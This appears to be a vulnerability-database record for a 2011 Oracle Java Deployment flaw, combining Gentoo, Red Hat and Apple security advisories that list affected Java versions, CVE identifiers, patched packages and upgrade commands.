var-201110-0393 Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JavaFX 2.0 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to Deployment. The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component. This vulnerability affects the following supported versions: JDK and JRE 7, 6 Update 27, JavaFX 2.0. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: November 05, 2011 Bugs: #340421, #354213, #370559, #387851 ID: 201111-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in the Oracle JRE/JDK, allowing attackers to cause unspecified impact. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-java/sun-jre-bin < 1.6.0.29 >= 1.6.0.29 * 2 app-emulation/emul-linux-x86-java < 1.6.0.29 >= 1.6.0.29 * 3 dev-java/sun-jdk < 1.6.0.29 >= 1.6.0.29 * ------------------------------------------------------------------- NOTE: Packages marked with asterisks require manual intervention! ------------------------------------------------------------------- 3 affected packages ------------------------------------------------------------------- Description =========== Multiple vulnerabilities have been reported in the Oracle Java implementation. Impact ====== A remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. Workaround ========== There is no known workaround at this time. Resolution ========== All Oracle JDK 1.6 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/sun-jdk-1.6.0.29" All Oracle JRE 1.6 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/sun-jre-bin-1.6.0.29" All users of the precompiled 32-bit Oracle JRE 1.6 should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.6.0.29" NOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically. This limitation is not present on a non-fetch restricted implementation such as dev-java/icedtea-bin. References ========== [ 1 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 2 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 3 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 4 ] CVE-2010-3550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3550 [ 5 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 6 ] CVE-2010-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3552 [ 7 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 8 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 9 ] CVE-2010-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3555 [ 10 ] CVE-2010-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3556 [ 11 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 12 ] CVE-2010-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3558 [ 13 ] CVE-2010-3559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3559 [ 14 ] CVE-2010-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3560 [ 15 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 16 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 17 ] CVE-2010-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3563 [ 18 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 19 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 20 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 21 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 22 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 23 ] CVE-2010-3570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3570 [ 24 ] CVE-2010-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3571 [ 25 ] CVE-2010-3572 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3572 [ 26 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 27 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 28 ] CVE-2010-4422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4422 [ 29 ] CVE-2010-4447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4447 [ 30 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 31 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 32 ] CVE-2010-4451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4451 [ 33 ] CVE-2010-4452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4452 [ 34 ] CVE-2010-4454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4454 [ 35 ] CVE-2010-4462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4462 [ 36 ] CVE-2010-4463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4463 [ 37 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 38 ] CVE-2010-4466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4466 [ 39 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 40 ] CVE-2010-4468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4468 [ 41 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 42 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 43 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 44 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 45 ] CVE-2010-4473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4473 [ 46 ] CVE-2010-4474 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4474 [ 47 ] CVE-2010-4475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4475 [ 48 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 49 ] CVE-2011-0802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0802 [ 50 ] CVE-2011-0814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0814 [ 51 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 52 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 53 ] CVE-2011-0863 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0863 [ 54 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 55 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 56 ] CVE-2011-0867 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0867 [ 57 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 58 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 59 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 60 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 61 ] CVE-2011-0873 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0873 [ 62 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 63 ] CVE-2011-3516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3516 [ 64 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 65 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 66 ] CVE-2011-3545 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3545 [ 67 ] CVE-2011-3546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3546 [ 68 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 69 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 70 ] CVE-2011-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3549 [ 71 ] CVE-2011-3550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3550 [ 72 ] CVE-2011-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 73 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 74 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 75 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 76 ] CVE-2011-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3555 [ 77 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 78 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 79 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 80 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 81 ] CVE-2011-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3561 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: java-1.6.0-sun security update Advisory ID: RHSA-2011:1384-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1384.html Issue date: 2011-10-19 CVE Names: CVE-2011-3389 CVE-2011-3516 CVE-2011-3521 CVE-2011-3544 CVE-2011-3545 CVE-2011-3546 CVE-2011-3547 CVE-2011-3548 CVE-2011-3549 CVE-2011-3550 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3555 CVE-2011-3556 CVE-2011-3557 CVE-2011-3558 CVE-2011-3560 CVE-2011-3561 ===================================================================== 1. Summary: Updated java-1.6.0-sun packages that fix several security issues are now available for Red Hat Enterprise Linux 4 Extras, and Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Desktop version 4 Extras - i386, x86_64 Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section. All running instances of Sun Java must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 737506 - CVE-2011-3389 HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST) 745379 - CVE-2011-3560 OpenJDK: missing checkSetFactory calls in HttpsURLConnection (JSSE, 7096936) 745387 - CVE-2011-3547 OpenJDK: InputStream skip() information leak (Networking/IO, 7000600) 745391 - CVE-2011-3551 OpenJDK: Java2D TransformHelper integer overflow (2D, 7023640) 745397 - CVE-2011-3552 OpenJDK: excessive default UDP socket limit under SecurityManager (Networking, 7032417) 745399 - CVE-2011-3544 OpenJDK: missing SecurityManager checks in scripting engine (Scripting, 7046823) 745442 - CVE-2011-3521 OpenJDK: IIOP deserialization code execution (Deserialization, 7055902) 745447 - CVE-2011-3554 OpenJDK: insufficient pack200 JAR files uncompress error checks (Runtime, 7057857) 745459 - CVE-2011-3556 OpenJDK: RMI DGC server remote code execution (RMI, 7077466) 745464 - CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012) 745473 - CVE-2011-3548 OpenJDK: mutable static AWTKeyStroke.ctor (AWT, 7019773) 745476 - CVE-2011-3553 OpenJDK: JAX-WS stack-traces information leak (JAX-WS, 7046794) 745492 - CVE-2011-3558 OpenJDK: Hotspot unspecified issue (Hotspot, 7070134) 747191 - CVE-2011-3545 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Sound) 747198 - CVE-2011-3549 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Swing) 747200 - CVE-2011-3550 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (AWT) 747203 - CVE-2011-3516 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment) 747205 - CVE-2011-3546 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment) 747206 - CVE-2011-3555 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (JRE) 747208 - CVE-2011-3561 Oracle/IBM JDK: unspecified vulnerability fixed in 6u29 (Deployment) 6. Package List: Red Hat Enterprise Linux AS version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Desktop version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux ES version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux WS version 4 Extras: i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el4.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el4.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el5.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.i586.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el5.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.i686.rpm x86_64: java-1.6.0-sun-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-demo-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.i686.rpm java-1.6.0-sun-devel-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.29-1jpp.1.el6.x86_64.rpm java-1.6.0-sun-src-1.6.0.29-1jpp.1.el6.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-3389.html https://www.redhat.com/security/data/cve/CVE-2011-3516.html https://www.redhat.com/security/data/cve/CVE-2011-3521.html https://www.redhat.com/security/data/cve/CVE-2011-3544.html https://www.redhat.com/security/data/cve/CVE-2011-3545.html https://www.redhat.com/security/data/cve/CVE-2011-3546.html https://www.redhat.com/security/data/cve/CVE-2011-3547.html https://www.redhat.com/security/data/cve/CVE-2011-3548.html https://www.redhat.com/security/data/cve/CVE-2011-3549.html https://www.redhat.com/security/data/cve/CVE-2011-3550.html https://www.redhat.com/security/data/cve/CVE-2011-3551.html https://www.redhat.com/security/data/cve/CVE-2011-3552.html https://www.redhat.com/security/data/cve/CVE-2011-3553.html https://www.redhat.com/security/data/cve/CVE-2011-3554.html https://www.redhat.com/security/data/cve/CVE-2011-3555.html https://www.redhat.com/security/data/cve/CVE-2011-3556.html https://www.redhat.com/security/data/cve/CVE-2011-3557.html https://www.redhat.com/security/data/cve/CVE-2011-3558.html https://www.redhat.com/security/data/cve/CVE-2011-3560.html https://www.redhat.com/security/data/cve/CVE-2011-3561.html https://access.redhat.com/security/updates/classification/#critical http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFOnw+BXlSAg2UNWIIRArM2AJwNT0vxdrXLgkZjOCwP8LkDemBYzQCbBrE3 0MJzQCB587rTzSRSo+gGytc= =809z -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-11-08-1 Java for Mac OS X 10.7 Update 1 and Java for Mac OS X 10.6 Update 6 Java for Mac OS X 10.7 Update 1 and Java for Mac OS X 10.6 Update 6 are now available and address the following: Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, Mac OS X v10.7.2, Mac OS X Server v10.7.2 Impact: Multiple vulnerabilities in Java 1.6.0_26 Description: Multiple vulnerabilities exist in Java 1.6.0_26, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. Visiting a web page containing a maliciously crafted untrusted Java applet may lead to arbitrary code execution with the privileges of the current user. These issues are addressed by updating to Java version 1.6.0_29. Further information is available via the Java website at http://java.sun.com/javase/6/webnotes/ReleaseNotes.html CVE-ID CVE-2011-3389 CVE-2011-3521 CVE-2011-3544 CVE-2011-3545 CVE-2011-3546 CVE-2011-3547 CVE-2011-3548 CVE-2011-3549 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3556 CVE-2011-3557 CVE-2011-3558 CVE-2011-3560 CVE-2011-3561 Java for Mac OS X 10.7 Update 1 and Java for Mac OS X 10.6 Update 6 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6.dmg Its SHA-1 digest is: be0ac75b8bac967f1d39a94ebf9482a61fb7d70b For Mac OS X v10.7 systems The download file is named: JavaForMacOSX10.7.dmg Its SHA-1 digest is: 7768e6aeb5adaa638c74d4c04150517ed99fed20 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJOuZNKAAoJEGnF2JsdZQeece8H/1I98YQ1LF4iDD442zB+WjZP 